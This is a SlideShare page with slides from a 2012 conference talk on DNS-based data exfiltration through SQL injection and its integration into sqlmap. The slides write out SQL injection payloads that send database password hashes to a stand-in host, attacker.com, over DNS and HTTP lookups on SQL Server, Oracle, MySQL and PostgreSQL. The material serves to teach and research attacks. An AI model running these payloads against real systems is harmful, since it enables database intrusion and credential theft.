SlideShare a Scribd company logo

DNS exfiltration using sqlmap

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.

Technology
1 of 26
Download to read offline
DNS exfiltration using sqlmap Miroslav Štampar (dev@sqlmap.org)
What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) PHDays 2012, Moscow (Russia) May 31, 2012 2
What is SQL injection? (2)  In plain speak, SQL injection is all about the unauthorized database access  “Hello World” vulnerable code example (PHP/MySQL):     $sql = "SELECT * FROM events WHERE id = " .  $_GET["id"];     $result = mysql_query($sql);  Sample attack:   http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a, (SELECT password FROM mysql.user LIMIT  0,1),0x3a,FLOOR(RAND(0)*2))x FROM  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) PHDays 2012, Moscow (Russia) May 31, 2012 3
What is SQL injection? (3)  Harder example (PHP/MySQL):     error_reporting(0);     set_magic_quotes_runtime(true);     $sql=”INSERT INTO Users (FirstName, LastName,  Age) VALUES  ('$_REQUEST[firstname]','$_REQUEST[lastname]', $_REQUEST[age])”;     @mysql_query($sql); PHDays 2012, Moscow (Russia) May 31, 2012 4
Technique classification  Inband (web page as channel) Union  Full  Partial Error-based  Inference (bit-by-bit) Boolean-based blind Time-based (and stacked queries)  Out-of-band (alternative transport channels) HTTP DNS PHDays 2012, Moscow (Russia) May 31, 2012 5
Inband techniques  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request PHDays 2012, Moscow (Russia) May 31, 2012 6
Inference techniques  Boolean-based blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked queries – ;INSERT INTO users VALUES  (10, 'test', 'testpass'), usually time-based data retrieval PHDays 2012, Moscow (Russia) May 31, 2012 7
Out-of-band (OOB) techniques  HTTP – AND LENGTH(UTL_HTTP.REQUEST  ('http://www.attacker.com/log.php?q='|| (SELECT password FROM SYS.USER$ WHERE  name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side  DNS – AND LENGTH(UTL_INADDR.  GET_HOST_ADDRESS((SELECT password FROM  SYS.USER$ WHERE  name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side PHDays 2012, Moscow (Russia) May 31, 2012 8
DNS protocol  relatively simple protocol  resolving domain names  UDP datagrams (except zone transfers which use TCP)  forwarding requests for arbitrary domain names  ...even if access to public networks is not allowed :) PHDays 2012, Moscow (Russia) May 31, 2012 9
DNS protocol (2)  Name resolving methods: Client lookup – checking local client's cache (same request already occurred) Iterative – checking DNS server's cache and configured zone records Recursive – if other methods fail, query is forwarded to others, sending back retrieved results to client PHDays 2012, Moscow (Russia) May 31, 2012 10
DNS protocol (3) PHDays 2012, Moscow (Russia) May 31, 2012 11
DNS exfiltration “Exfiltration [eks-fil-treyt, eks-fil-treyt] 1. verb (used without object) to escape furtively from an area under enemy control 2. verb (used with object) to smuggle out of an area under enemy control” (source: dictionary.reference.com) PHDays 2012, Moscow (Russia) May 31, 2012 12
DNS exfiltration (2)  When fast inband techniques fail data is (usually) extracted in a bit-by-bit manner  Most attackers will avoid exploitation of targets with time-based technique  Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic  Alternative methods are more than welcome (e.g. uploading of web shell scripts)  OOB techniques are rarely used (till now) PHDays 2012, Moscow (Russia) May 31, 2012 13
DNS exfiltration (3)  In some cases it's possible to incorporate SQL (sub)query results into DNS resolution requests  Any function that accepts network address could be used  Microsoft SQL Server, Oracle, MySQL and PostgreSQL  Potentially dozens of resulting characters can be transferred per single request PHDays 2012, Moscow (Russia) May 31, 2012 14
DNS exfiltration (4)  Microsoft SQL Server:     DECLARE @host varchar(1024);     SELECT @host=(SELECT TOP 1  master.dbo.fn_varbintohexstr(password_hash) FROM  sys.sql_logins WHERE name='sa')+'.attacker.com';     EXEC('master..xp_dirtree "'+@host+'c$"'); PHDays 2012, Moscow (Russia) May 31, 2012 15
DNS exfiltration (5)  Oracle:     SELECT DBMS_LDAP.INIT((SELECT password FROM  SYS.USER$ WHERE name='SYS')||'.attacker.com',80)  FROM DUAL;  MySQL:     SELECT LOAD_FILE(CONCAT('',(SELECT  password FROM mysql.user WHERE user='root' LIMIT  1),'.attacker.comfoobar')); PHDays 2012, Moscow (Russia) May 31, 2012 16
DNS exfiltration (6)  PostgreSQL:     DROP TABLE IF EXISTS table_output;     CREATE TABLE table_output(content text);     CREATE OR REPLACE FUNCTION temp_function()     RETURNS VOID AS $$     DECLARE exec_cmd TEXT;     DECLARE query_result TEXT;     BEGIN         SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE  usename='postgres');         exec_cmd := E'COPY table_output(content) FROM E''|| query_result||E'.attacker.comfoobar.txt'';         EXECUTE exec_cmd;     END;     $$ LANGUAGE plpgsql SECURITY DEFINER;     SELECT temp_function(); PHDays 2012, Moscow (Russia) May 31, 2012 17
DNS exfiltration (7) PHDays 2012, Moscow (Russia) May 31, 2012 18
DNS exfiltration (8) PHDays 2012, Moscow (Russia) May 31, 2012 19
Integration into sqlmap  New command line option: --dns-domain Turning on DNS exfiltration support Domain where should provoked DNS requests point to (e.g. --dns-domain=attacker.com)  DNS exfiltration vectors sent through previously detected SQLi (e.g. time-based)  Inband techniques have automatically higher priority  Hence, usable only in inference-only cases PHDays 2012, Moscow (Russia) May 31, 2012 20
Integration into sqlmap (2)  Domain name server entry (e.g. ns1.attacker.com) has to point to IP address of machine running sqlmap sqlmap being run as a fake DNS server Serving and logging all incoming DNS requests Dummy responses (e.g. 127.0.0.1) sent just to unblock web server instance PHDays 2012, Moscow (Russia) May 31, 2012 21
Integration into sqlmap (3)  Each pushed result enclosed with unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com) Cancelling caching mechanisms Easy to match SQLi requests with DNS results  Complying with RFC 1034 (Domain Names – Concepts and Facilities) Hex encoding results to preserve non-word chars Splitting long items to parts of length 63 (maximum length of one label name) Otherwise DNS resolution requests are immediately dropped as invalid (no resolution) PHDays 2012, Moscow (Russia) May 31, 2012 22
Experimental setup 1)Attacker (172.16.138.1) ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS ➢ sqlmap v1.0-dev (r5100) 2)Web Server (172.16.138.129) ➢ virtual machine – Windows XP 32-bit SP1 OS ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application 3)DNS Server (172.16.138.130) ➢ virtual machine – CentOS 6.2 64-bit OS ➢ BIND9 DNS daemon PHDays 2012, Moscow (Russia) May 31, 2012 23
Results (--dump -T COLLATIONS -D information_schema) Method # of requests Time (sec) Boolean-based blind 29,212 214.04 Time-based (1 sec) 32,716 17,720.51 Error-based 777 9.02 Union (full/partial) 3/136 0.70/2.50 DNS exfiltration 1,409 35.31 PHDays 2012, Moscow (Russia) May 31, 2012 24
Video presentation PHDays 2012, Moscow (Russia) May 31, 2012 25
Questions? PHDays 2012, Moscow (Russia) May 31, 2012 26

Recommended

sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
Miroslav Stampar
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Sql injection
Sql injectionSql injection
Sql injection
Mehul Boghra
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Sqlmap
SqlmapSqlmap
Sqlmap
Rushikesh Kulkarni
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 

Recommended

sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
Miroslav Stampar
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Sql injection
Sql injectionSql injection
Sql injection
Mehul Boghra
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Sqlmap
SqlmapSqlmap
Sqlmap
Rushikesh Kulkarni
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the Hood
Miroslav Stampar
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
amiable_indian
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
Bernardo Damele A. G.
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
Mikhail Egorov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmap
Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
Miroslav Stampar
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
Miroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
Miroslav Stampar
 

More Related Content

What's hot

Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
Bernardo Damele A. G.
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 

What's hot (20)

Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the Hood
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmap
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 

Viewers also liked

Don't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit TestingDon't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit Testing
aaronjorbin
 

Viewers also liked (20)

Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
WordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPressWordCamp SF 2011: Debugging in WordPress
WordCamp SF 2011: Debugging in WordPress
 
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
Taking WordPress to the World : Options for a Multilingual Site | WordCamp Sa...
 
eMusic: WordPress in the Enterprise
eMusic: WordPress in the EnterpriseeMusic: WordPress in the Enterprise
eMusic: WordPress in the Enterprise
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Index chrome
Index chromeIndex chrome
Index chrome
 
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
WordCamp San Francisco 2011: Transients, Caching, and the Complexities of Mul...
 
How Testing Changed My Life
How Testing Changed My LifeHow Testing Changed My Life
How Testing Changed My Life
 
E-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the MinefieldE-commerce & WordPress: Navigating the Minefield
E-commerce & WordPress: Navigating the Minefield
 
Don't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit TestingDon't Repeat Your Mistakes: JavaScript Unit Testing
Don't Repeat Your Mistakes: JavaScript Unit Testing
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 

Similar to DNS exfiltration using sqlmap

Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.
Positive Hack Days
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Positive Hack Days
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Positive Hack Days
 
Distributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevday
odnoklassniki.ru
 
Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2
rusersla
 
Jump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksJump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with Databricks
Anyscale
 
Teradata online training
Teradata online trainingTeradata online training
Teradata online training
Monster Courses
 
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Citus Data
 

Similar to DNS exfiltration using sqlmap (20)

Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.Miroslav Stampar. Sqlmap — Under the Hood.
Miroslav Stampar. Sqlmap — Under the Hood.
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
 
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hoodPh days 2013-miroslav-stampar_-_sqlmap_under_the_hood
Ph days 2013-miroslav-stampar_-_sqlmap_under_the_hood
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
RDBMS vs NoSQL
RDBMS vs NoSQLRDBMS vs NoSQL
RDBMS vs NoSQL
 
Mdb dn 2016_06_query_primer
Mdb dn 2016_06_query_primerMdb dn 2016_06_query_primer
Mdb dn 2016_06_query_primer
 
Building node.js applications with Database Jones
Building node.js applications with Database JonesBuilding node.js applications with Database Jones
Building node.js applications with Database Jones
 
Sql injection
Sql injectionSql injection
Sql injection
 
phptut4
phptut4phptut4
phptut4
 
phptut4
phptut4phptut4
phptut4
 
Distributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevday
 
A survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E CommunityA survey of DNSSEC Deployment in the US R&E Community
A survey of DNSSEC Deployment in the US R&E Community
 
Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2Los Angeles R users group - Dec 14 2010 - Part 2
Los Angeles R users group - Dec 14 2010 - Part 2
 
Yandex.Mail success story
Yandex.Mail success storyYandex.Mail success story
Yandex.Mail success story
 
About "Apache Cassandra"
About "Apache Cassandra"About "Apache Cassandra"
About "Apache Cassandra"
 
Quebec pdo
Quebec pdoQuebec pdo
Quebec pdo
 
Jump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with DatabricksJump Start on Apache Spark 2.2 with Databricks
Jump Start on Apache Spark 2.2 with Databricks
 
Teradata online training
Teradata online trainingTeradata online training
Teradata online training
 
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
Data Modeling, Normalization, and De-Normalization | PostgresOpen 2019 | Dimi...
 
The two faces of sql parameter sniffing
The two faces of sql parameter sniffingThe two faces of sql parameter sniffing
The two faces of sql parameter sniffing
 

More from Miroslav Stampar

More from Miroslav Stampar (8)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 

Recently uploaded

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 

Recently uploaded (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
